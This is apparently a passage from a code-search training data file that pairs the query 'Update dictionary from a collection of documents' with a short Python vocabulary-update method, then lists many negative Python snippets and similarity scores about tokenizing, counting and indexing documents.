Not all tokens are important\n for item in files:\n file_tokens = files[ item ]\n tokens_scores = [ ( token, score ) for ( token, score ) in file_tokens.items() ]\n sorted_tokens = sorted( tokens_scores, key=operator.itemgetter( 1 ), reverse=True )\n refined_tokens[ item ] = sorted_tokens\n tokens_file_name = 'tokens_' + source + '.txt'\n token_file_path = os.path.join( os.path.dirname( self.tools_data_path ) + '/' + tokens_file_name )\n with open( token_file_path, 'w' ) as file:\n file.write( json.dumps( refined_tokens ) )\n file.close()\n refined_tokens_sources[ source ] = refined_tokens\n return refined_tokens_sources", "def build_ngram_index(tokenized_documents, ngrams):\n dictionary = {}\n\n doc_ngrams = {}\n for doc in tokenized_documents:\n ngrams_freq = {}\n\n measures = nltk.collocations.BigramAssocMeasures()\n finder = BigramCollocationFinder.from_words(tokenized_documents[doc])\n freqs = finder.ngram_fd\n for ngram in freqs:\n ngrams_freq[ngram] = freqs[ngram]\n \n measures = nltk.collocations.TrigramAssocMeasures()\n finder = TrigramCollocationFinder.from_words(tokenized_documents[doc])\n freqs = finder.ngram_fd\n for ngram in freqs:\n ngrams_freq[ngram] = freqs[ngram]\n\n doc_ngrams[doc] = ngrams_freq\n\n for ngram in ngrams:\n dictionary[ngram] = [0]\n for doc in doc_ngrams:\n if ngram in doc_ngrams[doc]:\n dictionary[ngram][0] += doc_ngrams[doc][ngram]\n dictionary[ngram].append((doc, doc_ngrams[doc][ngram]))\n \n return dictionary" ]
[ "0.68999934", "0.6873283", "0.6396484", "0.6270356", "0.6200283", "0.61873966", "0.61502284", "0.6042249", "0.6037067", "0.5998114", "0.59293014", "0.58950543", "0.5877849", "0.5844076", "0.58293545", "0.5767847", "0.57396615", "0.5730059", "0.5711739", "0.563978", "0.5620126", "0.5615571", "0.56092644", "0.5603466", "0.56021726", "0.5600261", "0.5598487", "0.55603933", "0.5559371", "0.55493385", "0.5548632", "0.55470467", "0.5522555", "0.55198544", "0.55169094", "0.55155396", "0.5506191", "0.55021423", "0.54889655", "0.5485269", "0.5481285", "0.54811215", "0.546951", "0.5465656", "0.54644924", "0.54629964", "0.5460012", "0.54479206", "0.5440121", "0.54227835", "0.5421363", "0.5409679", "0.5388636", "0.5374139", "0.53666866", "0.53637534", "0.5349924", "0.5345804", "0.53425455", "0.534189", "0.5330862", "0.53307176", "0.53249925", "0.5320999", "0.53199095", "0.5316637", "0.5293466", "0.5287339", "0.5282561", "0.5279928", "0.52778906", "0.52778906", "0.5275979", "0.52614784", "0.5259829", "0.5256893", "0.5256046", "0.52554494", "0.5247021", "0.5243727", "0.5235125", "0.52288884", "0.5227093", "0.5222334", "0.52207357", "0.5218011", "0.52138984", "0.52111065", "0.5208889", "0.5208375", "0.5207914", "0.52025336", "0.5198126", "0.5186816", "0.51824564", "0.5160686", "0.5158809", "0.51471984", "0.51395386", "0.5131306" ]
0.67038983
2
Update dictionary from a collection of documents. Each document is a list of tokens.
def add_document_lists(self, docs):
    for sent in docs:
        sent = map(self.process_token, sent)
        self._token_count.update(sent)
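The record above pairs the query with a routine that folds tokenized documents into a running token-frequency dictionary. Below is a minimal, self-contained sketch of how such a routine might sit inside a vocabulary class; the Vocabulary wrapper, the lowercasing process_token helper, and the Counter-backed _token_count attribute are illustrative assumptions, not part of the dataset entry.

    # Minimal sketch (assumed surrounding class, for illustration only).
    from collections import Counter


    class Vocabulary:
        def __init__(self):
            # Running frequency of every token seen so far.
            self._token_count = Counter()

        def process_token(self, token):
            # Assumed normalization step: lowercase each token.
            return token.lower()

        def add_document_lists(self, docs):
            # Each document is a list of tokens; normalize, then update counts.
            for sent in docs:
                sent = map(self.process_token, sent)
                self._token_count.update(sent)


    if __name__ == "__main__":
        vocab = Vocabulary()
        vocab.add_document_lists([["The", "cat", "sat"], ["the", "dog", "ran"]])
        print(vocab._token_count)  # Counter({'the': 2, 'cat': 1, 'sat': 1, 'dog': 1, 'ran': 1})

Counter.update accepts any iterable of hashable items, so the map object is consumed lazily without building an intermediate list.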
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_documents(self, docs):\n for sent in docs:\n sent = map(self.process_token, sent)\n self._token_count.update(sent)", "def add_documents(self, docs):\n if 'sentences' in docs:\n for sent in docs.sentences:\n sent = map(self.process_token, [t for t in sent.tokens if not t.is_stopword])\n self._token_count.update(sent)\n\n else:\n sent = list(map(self.process_token, [t for t in docs.tokens if not t.is_stopword]))\n self._token_count.update(sent)", "def add_to_dict(self, tokens):\n# TODO: ?add normalization of a token?\n for token in tokens:\n if self.embedding_words and (token not in self.embedding_words):\n continue\n self.freq[token] += 1\n if token not in self.tok2ind:\n index = len(self.tok2ind)\n self.tok2ind[token] = index\n self.ind2tok[index] = token", "def update(tokens):\n global TOKENS\n\n for token_id in tokens:\n\n if token_id not in TOKENS:\n TOKENS[token_id] = {}\n\n if isinstance(tokens, dict):\n token_info = tokens[token_id]\n if token_info is None:\n token_info = {}\n\n alias = token_info.get(\"alias\")\n if alias is not None:\n TOKENS[token_id][\"alias\"] = alias\n\n decimals = token_info.get(\"decimals\")\n if decimals is not None:\n TOKENS[token_id][\"decimals\"] = decimals", "def intern_documents(documents: Dict[str, List[List[str]]], word_interner: Dict[str, int], unk_token: str):\n ret = dict()\n unk = word_interner[unk_token]\n for docid, sentences in documents.items():\n ret[docid] = [[word_interner.get(w, unk) for w in s] for s in sentences]\n return ret", "def update_existing(doc_data_tples):\n def per_doc(doc, data_tples):\n def per_field(data_tple):\n field, datas = data_tple\n map(_do_append_field(doc, field), datas)\n map(per_field, data_tples)\n return doc\n\n __docs = ( (per_doc(doc, data_tples), data_tples) for doc,data_tples in doc_data_tples )\n return __docs", "def updateDocumentAll(self, documents):\n docs = []\n for document in documents:\n if isinstance(document, couch.Document):\n document = document.getData()\n\n # these are required params\n if \"_id\" not in document or \"_rev\" not in document:\n raise Exception(\"Both _id & _rev fields are required!\")\n\n docs.append(document)\n\n return self.client.post(self.name +\"/_bulk_docs\", None,\n {\"docs\": docs}).getBodyData()", "def update_from_document(self, document_path):\n with open(document_path, 'r') as document_file:\n for sentence in document_file:\n words = sentence.strip().split()\n for word in words:\n self._add_new_word(word)", "def preprocess(self, documents):\n\n # A dict storing the frequency of each word\n word_freq = {}\n\n # Iterate for each document\n for doc in documents:\n # Split the document into a list of words and iterate on it\n for w in extract_words(doc):\n # Update word frequencies\n '''YOUR CODE HERE'''\n if w not in word_freq.keys():\n word_freq[w] = 1\n else:\n word_freq[w] += 1\n\n ''' END CODE FOR THIS LOOP '''\n\n\n # A set of words with frequency less than 'self.min_freq'\n remove_words = set()\n\n # Check frequency of each word and add to 'remove_words'\n # if it's frequency is below self.min_freq\n\n ''' YOUR CODE HERE '''\n for w in word_freq.keys():\n if word_freq[w] < self.min_freq:\n remove_words.add(w)\n\n # Delete the words in 'remove_words' from 'word_freq'\n for w in remove_words:\n del word_freq[w]\n\n # Fill 'self.word_to_idx' and 'self.idx_to_word' for\n # each word in 'word_freq' (dicts are explained above)\n\n i = 0\n for w in word_freq.keys():\n self.word_to_idx[w] = i\n self.idx_to_word[i] = w \n i += 1\n\n ''' END YOUR CODE HERE '''", 
"def fit(self, documents):\n # Get a list of all the unique tokens that appear\n vocab = list({\n token for doc in documents\n for token in self.tokenizer(doc)\n if token not in self._word2index\n })\n\n # This is UNK, START, END, and PAD.\n nb_special_tokens = 4\n\n # First, we map token -> ID, leaving the first slots for special tokens\n self._word2index.update({\n word: idx\n for idx, word in enumerate(vocab, nb_special_tokens)\n })\n\n # Next, we invert this map, which we can do since it was built from\n # unique vocabulary elements and is by definition bijective.\n self._index2word.update({\n idx: word\n for word, idx in self._word2index.items()\n })\n\n return self", "def multiple_document_processing(self) -> List:\n batch_list = []\n for doc, idx in self.__documents:\n entities_idx = {'idx': idx}\n entities_result = self.create_entity(document=doc)\n word_cleaned = self.clean_words(doc)\n entities_idx[self.key_spacy_text] = str(word_cleaned)\n entities_idx.update(entities_result)\n batch_list.append(entities_idx)\n return batch_list", "def get_doc_dicts(self, doc_ids):\n pass", "def updateMultipleDocuments(cred, payload):\n\n url = cred.base_url + \"documents:commit\"\n data = { 'writes': [] }\n\n for path, fieldData in payload.iteritems():\n pathData = createFirestoreDataObject(cred, path, fieldData)\n data['writes'].append(pathData)\n \n makeRequest(cred, url, 'POST', data)", "def add_doc_in_posting_list(word_posting_list, docs):\n for doc_score in docs:\n if doc_score[\"doc\"] in word_posting_list.keys():\n word_posting_list[doc_score[\"doc\"]] = int(doc_score[\"score\"]) + int(word_posting_list[doc_score[\"doc\"]])\n else:\n word_posting_list[doc_score[\"doc\"]] = doc_score[\"score\"]", "def load(self, documents, uniquify=False):\n assert documents, \"missing list of documents, text single doc per line\"\n assert isinstance(documents, list), \"documents must be list\"\n assert isinstance(documents[0], list), \"each document is also a list\"\n #--------------------------------------------------------------------------------------------\n\n def _get_new_counts(document):\n return Counter(document) if not uniquify else Counter(list(set(document)))\n\n for idx, document in enumerate(documents):\n new_counter = _get_new_counts(document)\n self.counter.update(new_counter)\n if idx % 1000 == 0:\n print(\"load: {}\\r\".format(idx), end='')\n return self", "def parse_doc(self, doc_as_list):\n\n tweet_id = doc_as_list[0]\n tweet_date = doc_as_list[1]\n full_text = doc_as_list[2]\n url = doc_as_list[3]\n indice = doc_as_list[4]\n retweet_text = doc_as_list[5]\n retweet_url = doc_as_list[6]\n retweet_indice = doc_as_list[7]\n quote_text = doc_as_list[8]\n quote_url = doc_as_list[9]\n quoted_indice = doc_as_list[10]\n retweet_quoted_text = doc_as_list[11]\n retweet_quoted_url = doc_as_list[12]\n retweet_quoted_indice = doc_as_list[13]\n\n term_dict = {}\n\n tokenized_text = self.parse_sentence(full_text)\n tokenized_quote = self.parse_sentence(quote_text)\n # tokenized_url = self.handle_url(url)\n\n\n doc_length = len(tokenized_text) # after text operations - length of full_text\n\n new_tokenized_text = tokenized_text + tokenized_quote\n\n # spell checker\n # new_tokenized_text = self.spell.update(new_tokenized_text)\n\n for term in new_tokenized_text:\n if term is not \"\": # or (term.isalpha() and len(term) == 1)\n if term not in term_dict:\n term_dict[term] = 1\n else:\n term_dict[term] += 1\n\n document = Document(tweet_id, tweet_date, full_text, url, retweet_text, retweet_url, 
quote_text,\n quote_url, term_dict, doc_length)\n return document", "def prepare_dictionary_from_docs(self):\n if os.path.exists(self.DICT_PATH):\n return True\n self.logger.info(\"START PREPARING DICT\")\n for fn in os.listdir(self.wiki_path):\n self.logger.info(\"dict update {0}\".format(fn))\n content = self.get_processed_content(fn)\n self.dictionary.add_documents([content])\n self.dictionary.filter_extremes(no_below=20, no_above=0.1, keep_n=100000)\n self.dictionary.compactify()\n self.dictionary.save(self.DICT_PATH)\n return True", "def get_dict(cleaned_docs):\n data = []\n for doc in cleaned_docs:\n data += doc\n return list(set(data))", "def transform(self, docs):\n return [doc for doc in docs]", "def doc2bow(self, document, allow_update=False, return_missing=False):\n\n doc=[t.text for t in document.tokens]\n\n if isinstance(doc, string_types):\n raise TypeError(\"doc2bow expects an array of unicode tokens on input, not a single string\")\n\n # Construct (word, frequency) mapping.\n counter = defaultdict(int)\n for w in doc:\n counter[w if isinstance(w, str) else str(w, 'utf-8')] += 1\n\n token2id = self.token2id\n if allow_update or return_missing:\n missing = sorted(x for x in iteritems(counter) if x[0] not in token2id)\n if allow_update:\n for w, _ in missing:\n # new id = number of ids made so far;\n # NOTE this assumes there are no gaps in the id sequence!\n token2id[w] = len(token2id)\n result = {token2id[w]: freq for w, freq in iteritems(counter) if w in token2id}\n\n if allow_update:\n self.num_docs += 1\n self.num_pos += sum(itervalues(counter))\n self.num_nnz += len(result)\n # keep track of document and collection frequencies\n for tokenid, freq in iteritems(result):\n self.cfs[tokenid] = self.cfs.get(tokenid, 0) + freq\n self.dfs[tokenid] = self.dfs.get(tokenid, 0) + 1\n\n # return tokenids, in ascending id order\n result = sorted(iteritems(result))\n if return_missing:\n return result, dict(missing)\n else:\n return result", "def _build_token_dict(self, corpus: List[List[str]]):\n self.token2idx = self.load_from_vocab_file(self.vocab_path)\n self.idx2token = dict([(value, key)\n for key, value in self.token2idx.items()])\n logging.debug(f\"build token2idx dict finished, contains {len(self.token2idx)} tokens.\")\n self.dataset_info['token_count'] = len(self.token2idx)", "def docs2ids(self):\n self.docs = [ [self.vocab[word] for word in doc] for doc in self.docs]", "def update_all(cls, documents: List[dict]) -> (List[dict], List[dict]):\n if not documents:\n raise ValidationFailed([], message=\"No data provided.\")\n\n if not isinstance(documents, list):\n raise ValidationFailed(documents, message=\"Must be a list.\")\n\n new_documents = copy.deepcopy(documents)\n\n errors = cls.validate_and_deserialize_update(new_documents)\n if errors:\n raise ValidationFailed(documents, errors)\n\n try:\n if cls.logger.isEnabledFor(logging.DEBUG):\n cls.logger.debug(f\"Updating {new_documents}...\")\n previous_documents, updated_documents = cls._update_many(new_documents)\n if cls.logger.isEnabledFor(logging.DEBUG):\n cls.logger.debug(f\"Documents updated to {updated_documents}.\")\n return (\n [cls.serialize(document) for document in previous_documents],\n [cls.serialize(document) for document in updated_documents],\n )\n except pymongo.errors.DuplicateKeyError:\n raise ValidationFailed(\n [cls.serialize(document) for document in documents],\n message=\"One document already exists.\",\n )", "def load_documents(data_dir: str, docids: Set[str] = None) -> Dict[str, List[List[str]]]:\n 
if os.path.exists(os.path.join(data_dir, 'docs.jsonl')):\n assert not os.path.exists(os.path.join(data_dir, 'docs'))\n return load_documents_from_file(data_dir, docids)\n\n docs_dir = os.path.join(data_dir, 'docs')\n res = dict()\n if docids is None:\n docids = sorted(os.listdir(docs_dir))\n else:\n docids = sorted(set(str(d) for d in docids))\n for d in docids:\n with open(os.path.join(docs_dir, d), 'r') as inf:\n lines = [l.strip() for l in inf.readlines()]\n lines = list(filter(lambda x: bool(len(x)), lines))\n tokenized = [list(filter(lambda x: bool(len(x)), line.strip().split(' '))) for line in lines]\n res[d] = tokenized\n return res", "def load_documents_from_file(data_dir: str, docids: Set[str] = None) -> Dict[str, List[List[str]]]:\n docs_file = os.path.join(data_dir, 'docs.jsonl')\n documents = load_jsonl(docs_file)\n documents = {doc['docid']: doc['document'] for doc in documents}\n res = dict()\n if docids is None:\n docids = sorted(list(documents.keys()))\n else:\n docids = sorted(set(str(d) for d in docids))\n for d in docids:\n lines = documents[d].split('\\n')\n tokenized = [line.strip().split(' ') for line in lines]\n res[d] = tokenized\n return res", "def initialize_terms_and_postings():\n global dictionary, postings\n for id in document_filenames:\n document = getDocumentContent(document_filenames[id])\n if(document_filenames[id].rfind(\".pdf\") == len(document_filenames[id]) - 4):\n terms = tokenize(document.encode('utf-8'))\n if(document_filenames[id].rfind(\".txt\") == len(document_filenames[id]) - 4):\n terms = tokenize(document)\n if(document_filenames[id].rfind(\".docx\") == len(document_filenames[id]) - 5):\n terms = tokenize(document)\n if(document_filenames[id].rfind(\".pptx\") == len(document_filenames[id]) - 5):\n terms = tokenize(document)\n unique_terms = set(terms)\n dictionary = dictionary.union(unique_terms)\n for term in unique_terms:\n postings[term][id] = terms.count(term) # the value is the\n # frequency of the\n # term in the\n # document", "def _create_dictionary(self, document_set):\n words = self._normalize_words(document_set.words)\n unique_words = frozenset(words)\n return dict((word, idx) for idx, word in enumerate(unique_words))", "def set_keyword_map(self):\n \n ret = defaultdict(list)\n for idx, doc in enumerate(self.docs):\n for token in doc:\n if token in self.dictionary.token2id:\n ret[token].append(idx)\n \n self.keyword_map = ret\n return ret", "def clean_docs(self,docs):\n\n # Remove numbers, but not words that contain numbers.\n docs = [[token for token in doc if not token.isnumeric()] for doc in docs]\n\n # Remove words that are only one character.\n docs = [[token for token in doc if len(token) > 1 and token not in stop_words] for doc in docs]\n\n # lemmatizer = WordNetLemmatizer()\n # docs = [[lemmatizer.lemmatize(token) for token in doc] for doc in docs]\n\n # Add bigrams and trigrams to docs (only ones that appear 20 times or more).\n bigram = Phrases(docs, min_count=20)\n for idx in range(len(docs)):\n for token in bigram[docs[idx]]:\n if '_' in token:\n # Token is a bigram, add to document.\n docs[idx].append(token)\n\n # Create a dictionary representation of the documents.\n dictionary = Dictionary(docs)\n\n # Filter out words that occur less than 20 documents, or more than 50% of the documents.\n dictionary.filter_extremes(no_below=20, no_above=0.5)\n\n # Bag-of-words representation of the documents.\n corpus = [dictionary.doc2bow(doc) for doc in docs]\n\n return docs,dictionary,corpus", "def add_new_doc(self, document, 
documents_list_length=10000):\n\n try:\n document_dictionary = document.term_doc_dictionary\n # self.countDoc += 1\n for term in document_dictionary.keys():\n if self.stemming == 'y':\n my_stemmer = Stemmer()\n term = my_stemmer.stem_term(term)\n # Update inverted index and posting\n if term not in self.inverted_idx.keys():\n self.inverted_idx[term] = [1, [\n (document_dictionary[term], document.tweet_id)]] # amount of doc, freq in the doc, doc id.\n\n else:\n self.inverted_idx[term][0] += 1 # amount of doc\n self.inverted_idx[term][1].append((document_dictionary[term],\n document.tweet_id)) # freq in the doc # doc id\n\n if term not in self.postingDict.keys():\n self.postingDict[term] = [(document.tweet_id, document_dictionary[term])]\n else:\n self.postingDict[term].append((document.tweet_id, document_dictionary[term]))\n # self.countTweet -= 1\n\n if document.tweet_id not in self.tweet_dict.keys():\n self.tweet_dict[document.tweet_id] = [[term, document_dictionary[term]], 1,\n 0] # [term,freq in tweet], amount of unique terms in tweet, amount of terms in tweet\n elif document_dictionary[term] > self.tweet_dict[document.tweet_id][0][\n 1]: # tweet exist, compering between freq in two terms\n if self.tweet_dict[document.tweet_id][0][\n 1] == 1: # before change term check if the last term is unique\n self.tweet_dict[document.tweet_id][\n 1] += 1 # last term is unique: add to the amount of uniqe terms in tweet\n self.tweet_dict[document.tweet_id][0] = [term,\n document_dictionary[term]] # change between the terms\n self.tweet_dict[document.tweet_id][2] += 1\n elif document_dictionary[term] == 1: # tweet exist, not most common, check if unique\n self.tweet_dict[document.tweet_id][1] += 1\n self.tweet_dict[document.tweet_id][2] += 1\n except:\n # print('problem in indexer : add_new_doc')\n # print(traceback.print_exc())\n pass", "def add(self, document):\n #words=[word.lower() for word in words if word.isalpha()] #added on 0415\n for token in [t.lower() for t in nltk.word_tokenize(document)]:\n if not token.isalpha():\n continue\n\n if token in self.stopwords:\n continue\n \n if self.stemmer:\n token = self.stemmer.stem(token)\n \n if self.__unique_id not in self.index[token]:\n self.index[token].append(self.__unique_id)\n \n self.documents[self.__unique_id] = document\n self.__unique_id += 1", "def preprocess(self, documents):\n\n # Store the total number of documents\n num_docs = np.float(len(documents))\n\n # A dict storing the frequency of each word across all documents\n total_word_freq = {}\n\n # A dict storing the number of documents that word appears in\n doc_word_freq = {}\n\n # Iterate over all documents\n for doc in documents:\n # Split the string into a list of words\n words = extract_words(doc)\n\n # Update the 'total_word_freq' dict using all words in 'words'\n for w in words:\n ''' YOUR CODE HERE '''\n if w not in total_word_freq.keys():\n total_word_freq[w] = 1\n else:\n total_word_freq[w] += 1\n\n ''' END CODE FOR THIS LOOP '''\n\n # Update the 'doc_word_freq' dict. Remember to only add '1' corresponding to\n # each word in a document. In case a word appears twice in a document, then\n # it should be ignored. 
We use the set() data structure to achieve this.\n for w in set(words):\n ''' YOUR CODE HERE '''\n if w not in doc_word_freq:\n doc_word_freq[w] = 1\n else:\n doc_word_freq[w] += 1\n\n ''' END CODE FOR THIS LOOP '''\n\n # A set of words with total frequency less than 'self.min_freq'\n remove_words = set()\n\n ''' YOUR CODE HERE '''\n\n # Check frequency of each word and add to 'remove_words'\n for w in total_word_freq.keys():\n if total_word_freq[w] < self.min_freq:\n remove_words.add(w)\n\n # Delete the words in 'remove_words' from 'total_word_freq' and\n # 'doc_word_freq'.\n for w in remove_words:\n del total_word_freq[w]\n del doc_word_freq[w]\n\n # Create a numpy array to store frequencies from which\n # we can create the 'self.idf' preprocessed numpy array.\n word_freq_tensor = np.zeros(len(doc_word_freq))\n\n # For each word in 'doc_word_freq' dict, update\n # 'self.word_to_idx' and 'self.idx_to_word' and\n # 'word_freq_tensor'.\n i = 0\n for w in doc_word_freq.keys():\n self.word_to_idx[w] = i \n self.idx_to_word[i] = w\n word_freq_tensor[i] = doc_word_freq[w]\n i+=1\n \n #print(word_freq_tensor.shape)\n #print(word_freq_tensor)\n # Calculate 'self.idf' (see hint.pdf for formula)\n self.idf = -1*np.log(word_freq_tensor/(len(documents)))\n ''' END YOUR CODE HERE '''", "def process_new_tokens(tokens,processed_tokens_set, model, dictionary):\n if hasattr(model, 'using_pretrained') and model.using_pretrained is not None:\n processed_tokens_set.update(tokens)\n update_embedding_layer(processed_tokens_set, model, dictionary)", "def process_document(text):\n words = preprocess(text)\n postings = {}\n for word, ix in words:\n if word in postings:\n wordinfo = postings[word]\n else:\n wordinfo = {\"frequency\": 0, \"indexes\": []}\n postings[word] = wordinfo\n wordinfo[\"frequency\"] += 1\n wordinfo[\"indexes\"].append(ix)\n return postings", "def pre_process(self, documents):\n\n return documents", "def insert_many(self, documents: Iterable[dict]) -> None:\n for i, document in enumerate(documents):\n if isinstance(document, dict):\n self._store_document(document)\n else:\n raise TypeError(\n f\"The document at index {i} was not a dictionary. 
All documents must be dictionaries.\"\n )\n self._dump()", "def _docMapping(self):\n doc2quests = defaultdict(list)\n for q, d in self.quest2doc.items():\n doc2quests[d].append(q)\n return doc2quests", "def create_document_dictionary(documents):\n \n document_dictionary = dict()\n for document in documents:\n document_dictionary[document.cord_uid] = document\n return document_dictionary", "def transform4Doc2Vec(docs):\n\n # transform documents to be used by doc2Vec\n documents = []\n analyzedDocument = namedtuple('AnalyzedDocument', 'words tags')\n for i, doc in enumerate(docs):\n # use first line if documents are not tokenized, otherwise next line\n # words = text.lower().split()\n tags = [i]\n documents.append(analyzedDocument(doc, tags))\n\n return documents", "def _create_dictionary(self, document):\n words = self._normalize_words(document.words)\n unique_words = frozenset(words)\n return dict((word, idx) for idx, word in enumerate(unique_words))", "def enrich(self, lazy_corpus_loader, fileids=None):\n tag_dict = self.tag_dict\n word_tag_dict = self.word_tag_dict\n for word_tag in lazy_corpus_loader.tagged_words(fileids=fileids):\n word = word_tag[0]\n tag = word_tag[1]\n if not tag_dict.get(tag, None):\n raise KeyError, \"Unknown pos-tag: %s\" % tag\n tag_dict = word_tag_dict.get(word, {})\n tag_dict[tag] = tag_dict.get(tag, 0) + 1\n word_tag_dict[word] = tag_dict\n self.word_tag_dict = word_tag_dict", "def add(self, tokens):\n\n for token in tokens:\n self.vocab.add(token)\n\n for leader, token in generate_ngrams(tokens, self.size, include_terminator = self.size != 1):\n if leader not in self.frequencies:\n self.frequencies[leader] = Frequency()\n\n self.frequencies[leader].add(token)", "def set_doc_phrases(doc_phrases, docs, phrases):\n for doc in docs:\n if not doc in doc_phrases:\n doc_phrases[doc] = []\n doc_phrases[doc] = doc_phrases[doc] + phrases", "def tokenize_document(doc_info: dict, tokenizer: BertTokenizer, max_doc_length: int = None) -> dict:\n sub_tokens: List[str] = [] # all sub tokens of a document\n sentence_map: List[int] = [] # collected tokenized tokens -> sentence id\n subtoken_map: List[int] = [] # collected tokenized tokens -> original token id\n\n word_idx = -1\n\n for sentence_id, sentence in enumerate(doc_info['sentences']):\n for token in sentence:\n word_idx += 1\n word_tokens = tokenizer.tokenize(token)\n sub_tokens.extend(word_tokens)\n sentence_map.extend([sentence_id] * len(word_tokens))\n subtoken_map.extend([word_idx] * len(word_tokens))\n if max_doc_length:\n num_to_pad = max_doc_length - len(sub_tokens)\n sub_tokens.extend([\"[PAD]\"] * num_to_pad)\n sentence_map.extend([sentence_map[-1]+1] * num_to_pad)\n subtoken_map.extend(list(range(word_idx+1, num_to_pad+1+word_idx)))\n # global MAX_LENGTH\n # if len(sub_tokens) > MAX_LENGTH:\n # print(len(sub_tokens))\n # MAX_LENGTH = len(sub_tokens)\n # print(MAX_LENGTH)\n # todo(yuxian): need pad speakers?\n speakers = {subtoken_map.index(word_index): tokenizer.tokenize(speaker)\n for word_index, speaker in doc_info['speakers']}\n clusters = [[(subtoken_map.index(start), len(subtoken_map) - 1 - subtoken_map[::-1].index(end))\n for start, end in cluster] for cluster in doc_info['clusters']]\n tokenized_document = {'sub_tokens': sub_tokens, 'sentence_map': sentence_map, 'subtoken_map': subtoken_map,\n 'speakers': speakers, 'clusters': clusters, 'doc_key': doc_info['doc_key']}\n return tokenized_document", "def replace_words_fun(self):\n\n cleaned_doc = []\n for word in str(self.doc).split():\n if word.lower() 
in self.replacement_list.keys():\n cleaned_doc.append(self.replacement_list[word.lower()])\n else:\n cleaned_doc.append(word)\n self.doc = ' '.join(cleaned_doc)", "def get_idf_dict(clean_corpus, tf_list, num_docs):\n \n idf_dict = {}\n for i in range(num_docs):\n for key in tf_list[i].keys():\n if key not in idf_dict.keys():\n idf_dict[key] = 0\n idf_dict[key] = idf_dict[key] + 1\n \n for key in idf_dict.keys():\n idf_dict[key] = math.log2(num_docs/idf_dict[key])\n # idf_dict's keys -> all unique tokens in the corpus \n return idf_dict", "def initialize_document_frequencies():\n global document_frequency\n for term in dictionary:\n document_frequency[term] = len(postings[term])", "def preprocess_corpus(corpus, stop_list, stop_words=True, stemm=True, bag_words=True):\n corpus_preprocessed = list()\n for element in corpus:\n new_element = dict()\n new_element['document'] = preprocess_document(element['text'], stop_list, stop_words, stemm, bag_words)\n new_element['id'] = element['id']\n corpus_preprocessed.append(new_element)\n\n return corpus_preprocessed", "def create_tokens_li():\n cnt=0\n for file in docs:\n file_name = open(\"./corpus/\"+ str(file) + \".txt\")\n print(cnt)\n cnt+=1\n words = file_name.read()\n tokens_doc = nltk.word_tokenize(words)\n tokens_doc = [w.lower() for w in tokens_doc]\n #tokens_doc = [snowball_stemmer.stem(token) for token in tokens_doc]\n tokens_doc = [token for token in tokens_doc if token not in nltk.corpus.stopwords.words('english')]\n tokens_li.append(tokens_doc)\n\n\n #storing in json file\n with open('savers/tokens.json', 'w') as fp:\n json.dump(tokens_li, fp)", "def documents(self, documents):\n\n self._documents = documents", "def documents_to_dict(documents: List[Dict]) -> Dict[str, Dict]:\n res = {}\n for doc in documents:\n res[doc['id']] = doc\n return res", "def map_docs(docs_file):\n word_map = defaultdict(int)\n doc_count = 0\n token_count = 0\n\n for _, doc_tokens in tokenize(docs_file):\n doc_count += 1 # count document\n token_count += len(doc_tokens) # count tokens\n for token in set(doc_tokens):\n word_map[token] += 1 # increase inverted index count\n\n docs_file.seek(0) # reset file pointer\n return doc_count, token_count, word_map", "def updateScores(rankedLists):\n docToRank = {}\n for rankedList in rankedLists:\n\n f = open(rankedList, 'r')\n for line in f:\n documentID = line.split()[2]\n docno = documentID\n score = float(line.split()[4])\n position = int(line.split()[3])\n docToRank[docno] = (position,score)\n f.close()\n client = MongoClient('asr2.iem.technion.ac.il',27017)\n db = client.asr16\n documents = db.documents.find({})\n for document in documents:\n key = document[\"query_id\"]+\"-\"+document[\"username\"]\n document['position'] = docToRank[key][0]\n document['score'] = docToRank[key][1]\n document['posted_document'] = document['current_document']\n db.documents.save(document)", "def merge_docs(self):", "def run(self, mapping={}, *args, **kwargs):\n self.processed = 0\n for batch in self._process_by_batch(self.load(*args, **kwargs)):\n batch = list(map(lambda doc: self._apply_mapping(doc, mapping), batch))\n for doc in batch:\n self._ingest(iterable=doc, doctype=doc[\"doctype\"])\n self.processed += 1\n logger.info(\"Added {} documents to the database.\".format(self.processed))", "def make_vocab_from_docs(docs):\n vocab_words=set()\n for doc in docs:\n doc=doc.lower()\n doc=re.sub(r'-',' ',doc)\n doc=re.sub(r' +',' ',doc) # turn multiple spaces into a single space\n doc=re.sub(r'[^a-z ]','',doc) # remove anything that is 
not a-z or space\n words=set(doc.split())\n vocab_words=vocab_words.union(words)\n vocab=dict(zip(vocab_words,range(len(vocab_words))))\n return vocab", "def _prepare_analysis_input(self, documents):\n subdoc_to_doc_map = {}\n wordtype_to_number = {}\n number_to_wordtype = []\n wordtypes = {}\n \n # prevent duplicating work\n if os.path.exists(self.wordtype_file):\n return\n \n try:\n # First find singletons\n if self.remove_singletons:\n word_type_count_threshold = max(1, int(math.log(documents.count(), 10)) - 2)\n temp_word_type_counts = {}\n for doc_index, doc in enumerate(documents):\n tokens = self.tokenize(doc.get_content())\n for token, token_start in tokens:\n temp_word_type_counts[token] = temp_word_type_counts.setdefault(token, 0) + 1\n for word_type, count in temp_word_type_counts.iteritems(): # add singletons to stopword list\n if count <= word_type_count_threshold:\n self._excluded_words[word_type] = True\n with io.open(self.excluded_words_file, 'w', encoding='utf-8') as ex_f:\n ex_f.write(unicode(json.dumps(self._excluded_words)))\n \n haltwords = dict(self.stopwords)\n haltwords.update(self._excluded_words)\n # Second find bigrams, iterate through documents and train.\n if self.find_bigrams:\n from import_tool.analysis.bigram_finder import BigramFinder\n bigram_finder = BigramFinder(stopwords=haltwords)\n for doc_index, doc in enumerate(documents):\n bigram_finder.train(doc_index, self.tokenize(doc.get_content()))\n bigram_finder.print()\n \n # Third, we're going to stem words\n if self.stem_words:\n from import_tool.analysis.stemmer import Stemmer\n stemmer = Stemmer(self._working_dir, self.base_dir)\n \n # for each document tokenize and map tokens to numbers to avoid regex problems before passing data to Mallet\n with io.open(self.mallet_input_file, 'w', encoding='utf-8') as w:\n with io.open(self.start_index_file, 'w', encoding='utf-8') as w2:\n count = 0\n subcount = 0\n for doc_index, doc in enumerate(documents):\n doc_content = unicode(doc.get_content())\n count += 1\n subdocuments = self.create_subdocuments(doc_index, doc_content)\n token_start_index_offset = 0 # needed to make sure the start index remains correct once the document is re-merged\n for subdoc_name, subdoc_content in subdocuments:\n if subcount > 0:\n w2.write(u'\\n')\n subcount += 1\n subdoc_to_doc_map[subdoc_name] = doc_index\n tokens = self.tokenize(subdoc_content)\n \n if self.find_bigrams:\n tokens = bigram_finder.combine(tokens, subdoc_content)\n \n token_numbers = []\n token_start_indices = []\n only_tokens = []\n 